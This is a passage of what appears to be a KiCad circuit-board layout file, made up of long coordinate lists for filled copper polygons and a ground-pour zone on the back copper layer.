108.516118) (xy 112.50321 108.501594) (xy 112.51019 108.496014) (xy 112.569852 108.447641) (xy 112.590941 108.42682) (xy 112.614069 108.408266) (xy 112.620416 108.401976) (xy 112.624171 108.398203) (xy 112.634564 108.385489) (xy 112.646679 108.374399) (xy 112.652604 108.367709) (xy 112.685714 108.329793) (xy 112.688637 108.3257) (xy 112.692244 108.322196) (xy 112.72492 108.274889) (xy 112.7583 108.228143) (xy 112.76037 108.223566) (xy 112.763231 108.219423) (xy 112.767513 108.211579) (xy 112.776148 108.195498) (xy 112.780243 108.195619) (xy 112.805133 108.199267) (xy 112.815861 108.198731) (xy 112.826957 108.199954) (xy 112.835893 108.199999) (xy 112.836937 108.199997) (xy 112.857861 108.197905) (xy 112.878341 108.198508) (xy 112.903 108.194376) (xy 112.929883 108.193032) (xy 112.938712 108.191655) (xy 112.977311 108.185361) (xy 113.009925 108.176707) (xy 113.043192 108.17102) (xy 113.070152 108.160725) (xy 113.098038 108.153325) (xy 113.128346 108.138502) (xy 113.159879 108.126461) (xy 113.184328 108.111124) (xy 113.210244 108.098449) (xy 113.237104 108.078016) (xy 113.258184 108.064792) ) ) (filled_polygon (pts (xy 123.334498 109.922194) (xy 123.371383 109.950535) (xy 123.406801 109.980682) (xy 123.420812 109.988514) (xy 123.433543 109.998296) (xy 123.475228 110.018932) (xy 123.503914 110.034967) (xy 123.414039 110.161535) (xy 123.412133 110.151342) (xy 123.406044 110.105818) (xy 123.400677 110.09007) (xy 123.39762 110.073717) (xy 123.380571 110.03107) (xy 123.365754 109.987589) (xy 123.357431 109.973184) (xy 123.351255 109.957735) (xy 123.32624 109.9192) (xy 123.320263 109.908856) ) ) ) (zone (net 0) (net_name "") (layer B.Cu) (tstamp 5DA529E6) (hatch edge 0.508) (connect_pads (clearance 0.508)) (min_thickness 0.254) (fill yes (arc_segments 32) (thermal_gap 0.508) (thermal_bridge_width 0.508)) (polygon (pts (xy 19.7 18.2) (xy 119.1 18.7) (xy 159.3 26.4) (xy 158.8 105.4) (xy 139 106.4) (xy 130.8 121.5) (xy 109.2 121.4) (xy 91.4 115.5) (xy 74.1 115.7) (xy 37.5 130.4) (xy 19.5 99.4) ) ) (filled_polygon (pts (xy 116.811138 20.238513) (xy 117.822526 20.265757) (xy 118.971069 20.340156) (xy 120.116717 20.450504) (xy 121.119476 20.585457) (xy 156.644907 26.344412) (xy 156.757122 26.373139) (xy 156.830971 26.406989) (xy 156.897066 26.452776) (xy 156.95425 26.50927) (xy 157.000887 26.574738) (xy 157.035534 26.647297) (xy 157.05716 26.725609) (xy 157.067602 26.840974) (xy 157.094579 102.668904) (xy 157.082933 102.791291) (xy 157.058855 102.873549) (xy 157.020383 102.9491) (xy 156.968762 103.016426) (xy 156.90581 103.073304) (xy 156.833604 103.117736) (xy 156.75355 103.148362) (xy 156.632486 103.169831) (xy 137.965149 104.671679) (xy 137.944732 104.672531) (xy 137.93164 104.674375) (xy 137.918459 104.675435) (xy 137.898347 104.679063) (xy 137.835061 104.687974) (xy 137.827941 104.687719) (xy 137.768344 104.697369) (xy 137.741996 104.701079) (xy 137.73511 104.70275) (xy 137.728119 104.703882) (xy 137.702399 104.710688) (xy 137.643725 104.724927) (xy 137.637264 104.727925) (xy 137.622778 104.731758) (xy 137.616014 104.732314) (xy 137.55763 104.748998) (xy 137.531594 104.755888) (xy 137.525274 104.758244) (xy 137.518784 104.760099) (xy 137.493711 104.770012) (xy 137.436842 104.791216) (xy 137.431072 104.794779) (xy 137.418506 104.799748) (xy 137.412092 104.801042) (xy 137.355844 104.824523) (xy 137.330569 104.834517) (xy 137.324782 104.837491) (xy 137.318774 104.839999) (xy 137.294829 104.852883) (xy 137.240627 104.880737) (xy 137.235502 104.884806) (xy 137.224265 104.890852) (xy 137.218122 104.892861) (xy 137.164944 104.922772) (xy 137.140923 104.935697) (xy 137.135585 104.939285) (xy 137.129985 104.942435) (xy 137.107658 104.958058) (xy 137.056998 104.992111) (xy 137.052439 104.996695) (xy 137.041989 105.004007) (xy 137.036051 105.006753) (xy 136.986772 105.042643) (xy 136.964508 105.058222) (xy 136.959572 105.062454) (xy 136.95431 105.066286) (xy 136.934 105.084377) (xy 136.887736 105.124038) (xy 136.883696 105.129182) (xy 136.873606 105.13817) (xy 136.867826 105.141721) (xy 136.823313 105.182966) (xy 136.803176 105.200902) (xy 136.798596 105.205868) (xy 136.79365 105.210451) (xy 136.775788 105.230599) (xy 136.73462 105.275239) (xy 136.731081 105.28103) (xy 136.721141 105.292242) (xy 136.715554 105.296666) (xy 136.67643 105.342677) (xy 136.658793 105.362571) (xy 136.654639 105.368303) (xy 136.650047 105.373703) (xy 136.634868 105.395583) (xy 136.599452 105.444451) (xy 136.596478 105.450921) (xy 136.56006 105.503418) (xy 136.547765 105.519757) (xy 136.540878 105.531068) (xy 136.533347 105.541924) (xy 136.523415 105.559749) (xy 128.056498 119.465887) (xy 128.008849 119.533816) (xy 127.968717 119.577699) (xy 127.923624 119.61585) (xy 127.874165 119.64792) (xy 127.821052 119.673487) (xy 127.765017 119.692162) (xy 127.706663 119.703619) (xy 127.623877 119.70899) (xy 111.93402 119.70899) (xy 111.158998 119.682715) (xy 110.399949 119.605308) (xy 109.647884 119.476732) (xy 108.894096 119.29461) (xy 93.440936 115.001948) (xy 93.435484 114.999944) (xy 93.408577 114.992959) (xy 93.381712 114.985496) (xy 93.375973 114.984494) (xy 92.96491 114.877779) (xy 92.953869 114.874141) (xy 92.932358 114.869328) (xy 92.911029 114.863791) (xy 92.899548 114.861987) (xy 92.479824 114.768079) (xy 92.468682 114.764822) (xy 92.447029 114.760742) (xy 92.4255 114.755925) (xy 92.413964 114.754511) (xy 91.991598 114.674924) (xy 91.980347 114.672044) (xy 91.958546 114.668696) (xy 91.93688 114.664613) (xy 91.925317 114.663592) (xy 91.50063 114.598364) (xy 91.489289 114.595867) (xy 91.467379 114.593257) (xy 91.445592 114.589911) (xy 91.434005 114.589282) (xy 91.007347 114.538462) (xy 90.995932 114.536351) (xy 90.973964 114.534486) (xy 90.952062 114.531877) (xy 90.940452 114.53164) (xy 90.512196 114.495279) (xy 90.5007 114.493553) (xy 90.478658 114.492431) (xy 90.456711 114.490568) (xy 90.445108 114.490724) (xy 90.015565 114.468868) (xy 90.004012 114.467532) (xy 89.981966 114.467158) (xy 89.959968 114.466039) (xy 89.948363 114.466589) (xy 89.523728 114.459391) (xy 89.51793 114.45882) (xy 89.490038 114.45882) (xy 89.462251 114.458349) (xy 89.456465 114.45882) (xy 74.291168 114.45882) (xy 74.283017 114.458213) (xy 74.257564 114.45882) (xy 74.232064 114.45882) (xy 74.223917 114.459622) (xy 73.778957 114.470234) (xy 73.762634 114.469798) (xy 73.745364 114.471035) (xy 73.728036 114.471448) (xy 73.711813 114.473438) (xy 73.260584 114.505752) (xy 73.244267 114.506093) (xy 73.227037 114.508154) (xy 73.209742 114.509393) (xy 73.193667 114.512147) (xy 72.745052 114.56582) (xy 72.728785 114.566935) (xy 72.711659 114.569815) (xy 72.694426 114.571877) (xy 72.678514 114.575389) (xy 72.233245 114.650273) (xy 72.217056 114.652159) (xy 72.200081 114.655851) (xy 72.18296 114.65873) (xy 72.167237 114.662993) (xy 71.726038 114.758944) (xy 71.70994 114.7616) (xy 71.693156 114.766095) (xy 71.676208 114.769781) (xy 71.660708 114.774786) (xy 71.22427 114.891675) (xy 71.208312 114.895095) (xy 71.191781 114.900377) (xy 71.175031 114.904863) (xy 71.159767 114.910606) (xy 70.728828 115.048298) (xy 70.713034 115.052478) (xy 70.696803 115.058531) (xy 70.680301 115.063803) (xy 70.6653 115.070277) (xy 70.248271 115.225782) (xy 70.240411 115.228064) (xy 70.21674 115.237539) (xy 70.192881 115.246436) (xy 70.185539 115.250029) (xy 38.159275 128.069883) (xy 38.046739 128.103422) (xy 37.964958 128.112294) (xy 37.883768 128.106578) (xy 37.804827 128.086762) (xy 37.730525 128.05353) (xy 37.663179 128.007827) (xy 37.60439 127.950296) (xy 37.536675 127.854357) (xy 25.03167 106.191256) (xy 105.722667 106.191256) (xy 105.722667 106.573516) (xy 105.725971 106.607216) (xy 105.726243 106.641076) (xy 105.732051 106.669224) (xy 105.734856 106.697826) (xy 105.744643 106.73024) (xy 105.751486 106.763404) (xy 105.762651 106.789888) (xy 105.770958 106.817401) (xy 105.786855 106.847299) (xy 105.800009 106.8785) (xy 105.816102 106.902306) (xy 105.824332 106.917785) (xy 105.803504 106.956306) (xy 105.77442 107.00921) (xy 105.77374 107.011353) (xy 105.772675 107.013323) (xy 105.754875 107.070825) (xy 105.736653 107.12827) (xy 105.736403 107.130498) (xy 105.735739 107.132643) (xy 105.729449 107.192489) (xy 105.722729 107.252397) (xy 105.722699 107.256712) (xy 105.722683 107.256865) (xy 105.722697 107.257018) (xy 105.722667 107.261333) (xy 105.722667 107.684667) (xy 105.728539 107.744554) (xy 105.734003 107.804591) (xy 105.734637 107.806746) (xy 105.734856 107.808977) (xy 105.752212 107.866461) (xy 105.769269 107.924415) (xy 105.77031 107.926407) (xy 105.770958 107.928552) (xy 105.799221 107.981708) (xy 105.827138 108.035107) (xy 105.828541 108.036852) (xy 105.829597 108.038838) (xy 105.867672 108.085521) (xy 105.905404 108.132452) (xy 105.907126 108.133897) (xy 105.908542 108.135633) (xy 105.954871 108.17396) (xy 106.001088 108.21274) (xy 106.003058 108.213823) (xy 106.004784 108.215251) (xy 106.057676 108.24385) (xy 106.110544 108.272914) (xy 106.112687 108.273594) (xy 106.114657 108.274659) (xy 106.172172 108.292463) (xy 106.229604 108.310681) (xy 106.231832 108.310931) (xy 106.233977 108.311595) (xy 106.293844 108.317887) (xy 106.315333 108.320298) (xy 106.315333 109.589667) (xy 106.32121 109.649605) (xy 106.326669 109.709591) (xy 106.327303 109.711746) (xy 106.327522 109.713977) (xy 106.344893 109.771511) (xy 106.361935 109.829415) (xy 106.362976 109.831407) (xy 106.363624 109.833552) (xy 106.391909 109.886749) (xy 106.419804 109.940107) (xy 106.421207 109.941852) (xy 106.422263 109.943838) (xy 106.460338 109.990521) (xy 106.49807 110.037452) (xy 106.499792 110.038897) (xy 106.501208 110.040633) (xy 106.547537 110.07896) (xy 106.593754 110.11774) (xy 106.595724 110.118823) (xy 106.59745 110.120251) (xy 106.650342 110.14885) (xy 106.70321 110.177914) (xy 106.705353 110.178594) (xy 106.707323 110.179659) (xy 106.764838 110.197463) (xy 106.82227 110.215681) (xy 106.824498 110.215931) (xy 106.826643 110.216595) (xy 106.88651 110.222887) (xy 106.946397 110.229605) (xy 106.950712 110.229635) (xy 106.950865 110.229651) (xy 106.951018 110.229637) (xy 106.955333 110.229667) (xy 107.463333 110.229667) (xy 107.523271 110.22379) (xy 107.54824 110.221518) (xy 107.544541 110.251816) (xy 107.544392 110.260751) (xy 107.536029 111.117245) (xy 107.521485 111.098791) (xy 107.497755 111.074083) (xy 107.476299 111.047372) (xy 107.454591 111.02914) (xy 107.434964 111.008704) (xy 107.406896 110.989082) (xy 107.380652 110.96704) (xy 107.355814 110.953371) (xy 107.332593 110.937137) (xy 107.30124 110.923337) (xy 107.271223 110.906817) (xy 107.244214 110.898236) (xy 107.218272 110.886817) (xy 107.184827 110.879368) (xy 107.15218 110.868995) (xy 107.124018 110.865823) (xy 107.096353 110.859661) (xy 107.062106 110.85885) (xy 107.02806 110.855015) (xy 107.019124 110.854949) (xy 106.708563 110.854808) (xy 106.398001 110.854667) (xy 106.374826 110.856929) (xy 106.351558 110.856334) (xy 106.312815 110.862981) (xy 106.273685 110.8668) (xy 106.251395 110.873519) (xy 106.228451 110.877455) (xy 106.191734 110.891501) (xy 106.154094 110.902847) (xy 106.133533 110.913767) (xy 106.111791 110.922085) (xy 106.078508 110.942992) (xy 106.043781 110.961436) (xy 106.025729 110.976145) (xy 106.006021 110.988525) (xy 105.97743 111.015501) (xy 105.94695 111.040337) (xy 105.932103 111.058267) (xy 105.91517 111.074244) (xy 105.892356 111.106269) (xy 105.867289 111.136543) (xy 105.85621 111.157011) (xy 105.8427 111.175976) (xy 105.826542 111.211821) (xy 105.807831 111.246389) (xy 105.800936 111.268626) (xy 105.79137 111.289848) (xy 105.782484 111.328138) (xy 105.77084 111.365692) (xy 105.768396 111.388841) (xy 105.763133 111.411521) (xy 105.761854 111.450825) (xy 105.757728 111.489908) (xy 105.759827 111.513086) (xy 105.759069 111.536361) (xy 105.765448 111.575165) (xy 105.768992 111.614306) (xy 105.775553 111.636636) (xy 105.77933 111.659613) (xy 105.79312 111.696425) (xy 105.804203 111.734146) (xy 105.814984 111.75479) (xy 105.823147 111.776582) (xy 105.84382 111.810009) (xy 105.862022 111.844864) (xy 105.876601 111.863014) (xy 105.888846 111.882813) (xy 105.894315 111.88988) (xy 106.118656 112.17563) (xy 106.118694 112.175669) (xy 106.119201 112.176323) (xy 106.255593 112.349558) (xy 106.255639 112.349606) (xy 106.256284 112.350434) (xy 106.415453 112.551875) (xy 106.415493 112.551917) (xy 106.416067 112.552651) (xy 106.567992 112.744314) (xy 106.568028 112.744351) (xy 106.568494 112.744946) (xy 106.597828 112.781858) (xy 106.597831 112.781861) (xy 106.617025 112.806045) (xy 106.511121 112.952813) (xy 106.403656 113.096807) (xy 106.248346 113.304151) (xy 106.24827 113.304277) (xy 106.246302 113.306895) (xy 106.109931 113.490999) (xy 106.109852 113.49113) (xy 106.107307 113.494566) (xy 105.997634 113.644788) (xy 105.997596 113.644853) (xy 105.993099 113.65108) (xy 105.917788 113.756905) (xy 105.913712 113.764011) (xy 105.908494 113.770324) (xy 105.903552 113.777769) (xy 105.870268 113.828678) (xy 105.866635 113.835634) (xy 105.861876 113.841864) (xy 105.848409 113.869259) (xy 105.836202 113.88814) (xy 105.826597 113.912297) (xy 105.812445 113.939394) (xy 105.810234 113.946917) (xy 105.806773 113.953958) (xy 105.803691 113.962346) (xy 105.80275 113.964963) (xy 105.797687 113.985004) (xy 105.790052 114.004207) (xy 105.784361 114.034962) (xy 105.777228 114.059233) (xy 105.776273 114.069776) (xy 105.772158 114.086065) (xy 105.771085 114.1067) (xy 105.767323 114.127028) (xy 105.767779 114.163525) (xy 105.765958 114.18363) (xy 105.766712 114.190778) (xy 105.765671 114.210802) (xy 105.768627 114.231256) (xy 105.768885 114.251924) (xy 105.777445 114.292489) (xy 105.779066 114.307846) (xy 105.780241 114.311638) (xy 105.783534 114.334424) (xy 105.790411 114.353926) (xy 105.794676 114.374138) (xy 105.811128 114.412681) (xy 105.814744 114.422934) (xy 105.816051 114.427151) (xy 105.816567 114.428104) (xy 105.825071 114.452222) (xy 105.835598 114.470006) (xy 105.843713 114.489017) (xy 105.867351 114.523648) (xy 105.888697 114.559709) (xy 105.902474 114.575106) (xy 105.91413 114.592182) (xy 105.944044 114.621562) (xy 105.971987 114.652789) (xy 105.988494 114.665218) (xy 106.003244 114.679704) (xy 106.03829 114.70271) (xy 106.071772 114.72792) (xy 106.090384 114.736908) (xy 106.107661 114.74825) (xy 106.146506 114.764011) (xy 106.184249 114.782238) (xy 106.204248 114.787439) (xy 106.223403 114.795211) (xy 106.231989 114.797687) (xy 106.270809 114.808586) (xy 106.328115 114.818777) (xy 106.38533 114.829737) (xy 106.393754 114.83045) (xy 106.393786 114.830456) (xy 106.393815 114.830455) (xy 106.394235 114.830491) (xy 106.496666 114.838451) (xy 106.509357 114.838195) (xy 106.521937 114.839913) (xy 106.530869 114.84019) (xy 106.675865 114.843676) (xy 106.678394 114.843489) (xy 106.680918 114.843778) (xy 106.689854 114.843859) (xy 106.710524 114.843904) (xy 106.710607 114.843896) (xy 106.712115 114.843906) (xy 107.019031 114.843811) (xy 107.056845 114.840091) (xy 107.094854 114.839281) (xy 107.11888 114.833989) (xy 107.143337 114.831583) (xy 107.179701 114.820592) (xy 107.216836 114.812412) (xy 107.239373 114.802555) (xy 107.262901 114.795444) (xy 107.296447 114.777594) (xy 107.331276 114.762362) (xy 107.35146 114.748322) (xy 107.373169 114.736771) (xy 107.402621 114.712735) (xy 107.433815 114.691037) (xy 107.450887 114.673345) (xy 107.46994 114.657796) (xy 107.494157 114.628504) (xy 107.520548 114.601155) (xy 107.526047 114.594111) (xy 107.610609 114.484218) (xy 107.619576 114.501082) (xy 107.647471 114.55444) (xy 107.648874 114.556185) (xy 107.64993 114.558171) (xy 107.688005 114.604854) (xy 107.725737 114.651785) (xy 107.727459 114.65323) (xy 107.728875 114.654966) (xy 107.775204 114.693293) (xy 107.821421 114.732073) (xy 107.823391 114.733156) (xy 107.825117 114.734584) (xy 107.878009 114.763183) (xy 107.930877 114.792247) (xy 107.93302 114.792927) (xy 107.93499 114.793992) (xy 107.992505 114.811796) (xy 108.049937 114.830014) (xy 108.052165 114.830264) (xy 108.05431 114.830928) (xy 108.114177 114.83722) (xy 108.174064 114.843938) (xy 108.178379 114.843968) (xy 108.178532 114.843984) (xy 108.178685 114.84397) (xy 108.183 114.844) (xy 108.733333 114.844) (xy 108.793271 114.838123) (xy 108.853257 114.832664) (xy 108.855412 114.83203) (xy 108.857643 114.831811) (xy 108.915224 114.814426) (xy 108.973081 114.797398) (xy 108.975073 114.796357) (xy 108.977218 114.795709) (xy 109.030415 114.767424) (xy 109.083773 114.739529) (xy 109.085518 114.738126) (xy 109.087504 114.73707) (xy 109.134187 114.698995) (xy 109.156963 114.680684) (xy 109.172204 114.693293) (xy 109.218421 114.732073) (xy 109.220391 114.733156) (xy 109.222117 114.734584) (xy 109.275009 114.763183) (xy 109.327877 114.792247) (xy 109.33002 114.792927) (xy 109.33199 114.793992) (xy 109.389505 114.811796) (xy 109.446937 114.830014) (xy 109.449165 114.830264) (xy 109.45131 114.830928) (xy 109.511177 114.83722) (xy 109.571064 114.843938) (xy 109.575379 114.843968) (xy 109.575532 114.843984) (xy 109.575685 114.84397) (xy 109.58 114.844) (xy 110.130333 114.844) (xy 110.190271 114.838123) (xy 110.250257 114.832664) (xy 110.252412 114.83203) (xy 110.254643 114.831811) (xy 110.312224 114.814426) (xy 110.370081 114.797398) (xy 110.372073 114.796357) (xy 110.374218 114.795709) (xy 110.427415 114.767424) (xy 110.480773 114.739529) (xy 110.482518 114.738126) (xy 110.484504 114.73707) (xy 110.518158 114.709622) (xy 110.553474 114.729146) (xy 110.597746 114.755631) (xy 110.608047 114.759317) (xy 110.617619 114.764609) (xy 110.666782 114.780334) (xy 110.715349 114.797713) (xy 110.726159 114.799327) (xy 110.736587 114.802662) (xy 110.745337 114.804479) (xy 110.835194 114.822494) (xy 110.863947 114.825383) (xy 110.892247 114.831278) (xy 110.901138 114.832175) (xy 111.05253 114.846398) (xy 111.061436 114.846362) (xy 111.070229 114.847814) (xy 111.07915 114.84834) (xy 111.269009 114.858215) (xy 111.273437 114.858012) (xy 111.277831 114.858613) (xy 111.286763 114.858892) (xy 111.492018 114.863861) (xy 111.496103 114.86356) (xy 111.500171 114.864006) (xy 111.509107 114.864046) (xy 111.706692 114.863552) (xy 111.713905 114.862827) (xy 111.721136 114.863353) (xy 111.730067 114.863066) (xy 111.896908 114.85655) (xy 111.916704 114.853826) (xy 111.936697 114.853753) (xy 111.94558 114.852786) (xy 112.058611 114.839692) (xy 112.061971 114.838965) (xy 112.065167 114.838877) (xy 112.087411 114.833832) (xy 112.11031 114.831549) (xy 112.119061 114.829738) (xy 112.119298 114.829687) (xy 112.149731 114.819978) (xy 112.180692 114.813279) (xy 112.183608 114.812017) (xy 112.18698 114.811252) (xy 112.19544 114.808375) (xy 112.452589 114.718939) (xy 112.481776 114.705466) (xy 112.512102 114.694829) (xy 112.538342 114.679355) (xy 112.565996 114.66659) (xy 112.591998 114.647714) (xy 112.619693 114.631382) (xy 112.626874 114.626062) (xy 112.820914 114.480221) (xy 112.841829 114.461036) (xy 112.860966 114.497641) (xy 112.888887 114.551717) (xy 112.889906 114.552997) (xy 112.89066 114.55444) (xy 112.928781 114.601854) (xy 112.966659 114.649457) (xy 112.967901 114.65051) (xy 112.968926 114.651785) (xy 113.01564 114.690982) (xy 113.061934 114.73023) (xy 113.063357 114.731022) (xy 113.06461 114.732073) (xy 113.118012 114.761431) (xy 113.171083 114.790959) (xy 113.172634 114.79146) (xy 113.174066 114.792247) (xy 113.232031 114.810634) (xy 113.289949 114.829331) (xy 113.291574 114.829522) (xy 113.293126 114.830014) (xy 113.35355 114.836792) (xy 113.414004 114.843884) (xy 113.415629 114.843756) (xy 113.417253 114.843938) (xy 113.426189 114.844) (xy 113.975951 114.844) (xy 114.031548 114.838548) (xy 114.087271 114.834245) (xy 114.093665 114.832458) (xy 114.100261 114.831811) (xy 114.153709 114.815674) (xy 114.207565 114.80062) (xy 114.213489 114.797625) (xy 114.219836 114.795709) (xy 114.269179 114.769473) (xy 114.319038 114.744269) (xy 114.32426 114.740187) (xy 114.330122 114.73707) (xy 114.373427 114.701751) (xy 114.417444 114.667341) (xy 114.42178 114.662315) (xy 114.426917 114.658125) (xy 114.462508 114.615103) (xy 114.499032 114.572764) (xy 114.502309 114.566991) (xy 114.506535 114.561883) (xy 114.510882 114.553843) (xy 114.511194 114.55444) (xy 114.515406 114.559679) (xy 114.518649 114.565578) (xy 114.554511 114.608316) (xy 114.58946 114.651785) (xy 114.594616 114.656111) (xy 114.598937 114.661261) (xy 114.642389 114.696198) (xy 114.685144 114.732073) (xy 114.691041 114.735315) (xy 114.696281 114.739528) (xy 114.745698 114.765363) (xy 114.7946 114.792247) (xy 114.801014 114.794281) (xy 114.806973 114.797397) (xy 114.860486 114.813147) (xy 114.91366 114.830014) (xy 114.920344 114.830764) (xy 114.926797 114.832663) (xy 114.98233 114.837717) (xy 115.037787 114.843938) (xy 115.046723 114.844) (xy 115.591333 114.844) (xy 115.650103 114.838237) (xy 115.708872 114.833114) (xy 115.712198 114.832149) (xy 115.715643 114.831811) (xy 115.772103 114.814765) (xy 115.828829 114.798303) (xy 115.831907 114.796709) (xy 115.835218 114.795709) (xy 115.887355 114.767988) (xy 115.939739 114.740854) (xy 115.94244 114.738699) (xy 115.945504 114.73707) (xy 115.991276 114.699739) (xy 116.03738 114.662958) (xy 116.039617 114.660312) (xy 116.042299 114.658125) (xy 116.079891 114.612684) (xy 116.118031 114.567579) (xy 116.119712 114.564548) (xy 116.121917 114.561883) (xy 116.137217 114.533587) (xy 116.145471 114.54834) (xy 116.171058 114.578376) (xy 116.194411 114.610177) (xy 116.21147 114.625814) (xy 116.226471 114.643422) (xy 116.2574 114.667912) (xy 116.286489 114.694575) (xy 116.306257 114.706598) (xy 116.324396 114.720961) (xy 116.359498 114.73898) (xy 116.393207 114.759482) (xy 116.414932 114.767436) (xy 116.435516 114.778002) (xy 116.473454 114.788861) (xy 116.5105 114.802424) (xy 116.533354 114.806006) (xy 116.5556 114.812374) (xy 116.594915 114.815656) (xy 116.633898 114.821767) (xy 116.642823 114.82222) (xy 116.928573 114.834738) (xy 116.928575 114.834738) (xy 117.214325 114.847255) (xy 117.226122 114.846618) (xy 117.237865 114.847852) (xy 117.288382 114.843255) (xy 117.33905 114.840518) (xy 117.350495 114.837602) (xy 117.362257 114.836532) (xy 117.410937 114.822205) (xy 117.46009 114.809683) (xy 117.470748 114.804602) (xy 117.482081 114.801266) (xy 117.527034 114.777765) (xy 117.572836 114.755927) (xy 117.582312 114.748866) (xy 117.592773 114.743397) (xy 117.632307 114.711612) (xy 117.671918 114.682095) (xy 117.706254 114.710906) (xy 117.707689 114.711695) (xy 117.708944 114.712737) (xy 117.762319 114.741728) (xy 117.81571 114.77108) (xy 117.817269 114.771574) (xy 117.818704 114.772354) (xy 117.87683 114.790468) (xy 117.93477 114.808847) (xy 117.936391 114.809029) (xy 117.937954 114.809516) (xy 117.998387 114.815983) (xy 118.058897 114.822771) (xy 118.062017 114.822793) (xy 118.062151 114.822807) (xy 118.062291 114.822795) (xy 118.067833 114.822833) (xy 118.575833 114.822833) (xy 118.594693 114.820984) (xy 118.613631 114.821716) (xy 118.656729 114.814901) (xy 118.700143 114.810644) (xy 118.718282 114.805168) (xy 118.737004 114.802207) (xy 118.77796 114.78715) (xy 118.819718 114.774542) (xy 118.825645 114.77139) (xy 118.933667 114.801494) (xy 118.969432 114.807782) (xy 119.004566 114.816981) (xy 119.0134 114.818328) (xy 119.203438 114.845956) (xy 119.222952 114.846867) (xy 119.242175 114.850388) (xy 119.251085 114.85107) (xy 119.460691 114.865656) (xy 119.47951 114.865124) (xy 119.498226 114.867163) (xy 119.507162 114.867197) (xy 119.704012 114.866569) (xy 119.736181 114.863311) (xy 119.768523 114.863103) (xy 119.777404 114.862111) (xy 119.929173 114.844097) (xy 119.959012 114.837553) (xy 119.978349 114.835898) (xy 119.985254 114.833906) (xy 119.996085 114.832528) (xy 120.004784 114.830479) (xy 120.012845 114.828521) (xy 120.034187 114.821068) (xy 120.05118 114.817341) (xy 120.067787 114.810096) (xy 120.098361 114.801276) (xy 120.106641 114.797915) (xy 120.322627 114.708484) (xy 120.363953 114.686425) (xy 120.406313 114.666414) (xy 120.418951 114.657067) (xy 120.432817 114.649666) (xy 120.469062 114.620008) (xy 120.506739 114.592144) (xy 120.513328 114.586108) (xy 120.551343 114.5508) (xy 120.579639 114.585098) (xy 120.616237 114.630618) (xy 120.619341 114.633223) (xy 120.621917 114.636345) (xy 120.667119 114.673313) (xy 120.711921 114.710906) (xy 120.715474 114.712859) (xy 120.718605 114.71542) (xy 120.770121 114.742902) (xy 120.821377 114.77108) (xy 120.825239 114.772305) (xy 120.82881 114.77421) (xy 120.884753 114.791183) (xy 120.940437 114.808847) (xy 120.944456 114.809298) (xy 120.948336 114.810475) (xy 121.00649 114.816257) (xy 121.064564 114.822771) (xy 121.072576 114.822827) (xy 121.07263 114.822832) (xy 121.072679 114.822827) (xy 121.0735 114.822833) (xy 121.5815 114.822833) (xy 121.615358 114.819513) (xy 121.649386 114.819223) (xy 121.677377 114.813432) (xy 121.70581 114.810644) (xy 121.738375 114.800812) (xy 121.771702 114.793917) (xy 121.798034 114.7828) (xy 121.825385 114.774542) (xy 121.841174 114.766147) (xy 122.030799 114.826133) (xy 122.032358 114.826463) (xy 122.033823 114.827081) (xy 122.093418 114.839391) (xy 122.152996 114.852005) (xy 122.154587 114.852026) (xy 122.156146 114.852348) (xy 122.165038 114.853231) (xy 122.446966 114.879239) (xy 122.506493 114.878897) (xy 122.566054 114.879099) (xy 122.571724 114.878522) (xy 122.57187 114.878521) (xy 122.572008 114.878493) (xy 122.574944 114.878194) (xy 122.865907 114.846554) (xy 122.896943 114.840067) (xy 122.928468 114.836598) (xy 122.9372 114.834697) (xy 122.965615 114.828304) (xy 122.986977 114.821248) (xy 122.988171 114.820998) (xy 122.989708 114.820345) (xy 123.008188 114.814241) (xy 123.051491 114.802547) (xy 123.059827 114.799327) (xy 123.266007 114.718058) (xy 123.302951 114.699142) (xy 123.341058 114.682695) (xy 123.358421 114.670742) (xy 123.377188 114.661133) (xy 123.409749 114.635406) (xy 123.437431 114.616349) (xy 123.470428 114.646153) (xy 123.506383 114.681221) (xy 123.51669 114.687936) (xy 123.525822 114.696184) (xy 123.568941 114.721978) (xy 123.611038 114.749404) (xy 123.622457 114.753991) (xy 123.633014 114.760306) (xy 123.680324 114.777235) (xy 123.726943 114.795961) (xy 123.739028 114.798241) (xy 123.750617 114.802388) (xy 123.759299 114.804503) (xy 123.820563 114.818971) (xy 123.822131 114.819183) (xy 123.823632 114.819688) (xy 123.884023 114.827538) (xy 123.944346 114.835682) (xy 123.945926 114.835585) (xy 123.947495 114.835789) (xy 123.956429 114.836008) (xy 124.082597 114.838224) (xy 124.093932 114.837313) (xy 124.105273 114.838221) (xy 124.114206 114.837999) (xy 124.206692 114.835054) (xy 124.20684 114.835035) (xy 124.21235 114.834849) (xy 124.520569 114.822304) (xy 124.577833 114.814326) (xy 124.635152 114.807195) (xy 124.639619 114.805719) (xy 124.644281 114.805069) (xy 124.698839 114.786144) (xy 124.753748 114.767994) (xy 124.757851 114.765674) (xy 124.762289 114.764134) (xy 124.812139 114.734969) (xy 124.862469 114.706503) (xy 124.866035 114.703437) (xy 124.870099 114.701059) (xy 124.913357 114.662746) (xy 124.957177 114.625065) (xy 124.960084 114.621359) (xy 124.963603 114.618242) (xy 124.998578 114.57228) (xy 125.034262 114.526783) (xy 125.036392 114.522586) (xy 125.039241 114.518842) (xy 125.064618 114.46697) (xy 125.090791 114.415401) (xy 125.09398 114.407053) (xy 125.252328 113.98372) (xy 125.25233 113.983714) (xy 125.255153 113.976167) (xy 125.913036 113.976167) (xy 126.064626 114.398875) (xy 126.090948 114.454487) (xy 126.117653 114.51109) (xy 126.11789 114.511411) (xy 126.118062 114.511774) (xy 126.154709 114.561247) (xy 126.191875 114.611553) (xy 126.192176 114.611828) (xy 126.19241 114.612143) (xy 126.237624 114.653244) (xy 126.284197 114.695685) (xy 126.284538 114.695891) (xy 126.284835 114.696161) (xy 126.33775 114.728045) (xy 126.391102 114.760283) (xy 126.391483 114.760421) (xy 126.391821 114.760625) (xy 126.449848 114.781598) (xy 126.508518 114.802885) (xy 126.508913 114.802946) (xy 126.50929 114.803082) (xy 126.570582 114.81243) (xy 126.631972 114.821871) (xy 126.632721 114.821907) (xy 126.632768 114.821914) (xy 126.632821 114.821912) (xy 126.640898 114.822298) (xy 127.248768 114.847166) (xy 127.306338 114.84389) (xy 127.363917 114.841484) (xy 127.368629 114.840345) (xy 127.373472 114.840069) (xy 127.429275 114.825681) (xy 127.485325 114.812129) (xy 127.489732 114.810094) (xy 127.494423 114.808884) (xy 127.546374 114.78393) (xy 127.598719 114.759752) (xy 127.60264 114.756904) (xy 127.607014 114.754803) (xy 127.653155 114.720213) (xy 127.699779 114.686347) (xy 127.703075 114.682789) (xy 127.706955 114.67988) (xy 127.745475 114.637012) (xy 127.784657 114.594711) (xy 